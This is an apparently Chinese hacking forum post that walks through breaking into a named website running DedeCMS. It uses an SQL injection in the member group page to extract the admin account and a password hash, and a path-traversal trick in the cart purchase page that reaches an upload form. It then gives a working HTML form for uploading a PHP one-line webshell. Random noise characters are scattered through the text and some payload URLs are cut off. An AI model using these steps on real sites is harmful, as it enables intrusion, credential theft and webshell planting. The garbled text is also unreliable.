①注入漏洞。; p; r, P$ g4 P H" w: U9 G
这站 http://www.political-security.com/
& B/ P P, `' T* |首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,; D1 _0 f7 \7 I9 l5 E
www.political-security.com/data/mysql_error_trace.inc 爆后台 U1 z" B% t- _6 R* [0 m0 z% ^/ a' w
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。2 z+ _1 A- n& l& E
然后写上语句 " b/ `1 ~& b; E% m0 a
查看管理员帐号6 s1 [2 _; J2 |, w- i
http://www.political-security.co ... &membergroup=@`' X- M) z e' d5 Z
! ^9 o* Z+ A1 K4 x8 p
admin ( i! i" f8 d, r( s2 R9 k8 g% s
! W/ s1 _+ }1 ?! q- s; P
查看管理员密码
. D4 H! N; R8 |7 c http://www.political-security.co ... &membergroup=@`/ O( r, X1 d, x9 f- A7 d: w* t
6 N$ r- v! T; b
8d29b1ef9f8c5a5af4297 E: O$ L! w. o& s
8 o. T6 I* g6 T7 D) X* K; @
查看管理员密码& C8 S5 ~) E! v; Q
9 u& K' K; r" [7 C
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5& q# p @' f E+ O1 O
/ d8 C; Y8 E/ z$ ~4 ~9 k
8d2
/ K$ p; n5 n7 M9b1ef9f8c5a5af42
7 C& C& \$ R' v7 I1 J9
( b; T& ?) N$ a# r% x" T8 K
8 g+ W$ @* t" o0 r- icmd5没解出来 只好测试第二个方法
$ |. c; M4 l' _0 e5 M1 a
' s/ [3 M+ G% \: b" ?, s( ]8 l, Y* x5 Q3 c- e B
②上传漏洞:
' u1 M0 ?0 [; k t3 U
0 x% L- s5 K: Z- U8 Z* c只要登陆会员中心,然后访问页面链接
! K7 h4 U d' l- l8 n5 j- r“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
, {9 A' c0 M- t& N: d. |$ h0 b& _% ?2 w
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”9 `3 n7 i( r! t$ R. g2 p
& @) c3 t8 x0 A/ ~/ M; H# @" X于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm) u( L% S8 J& q
% N2 i! H# q* l<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
+ X. B3 f0 i9 J; `或者( F; z( c) Y3 H: | V3 ~
即可上传成功 |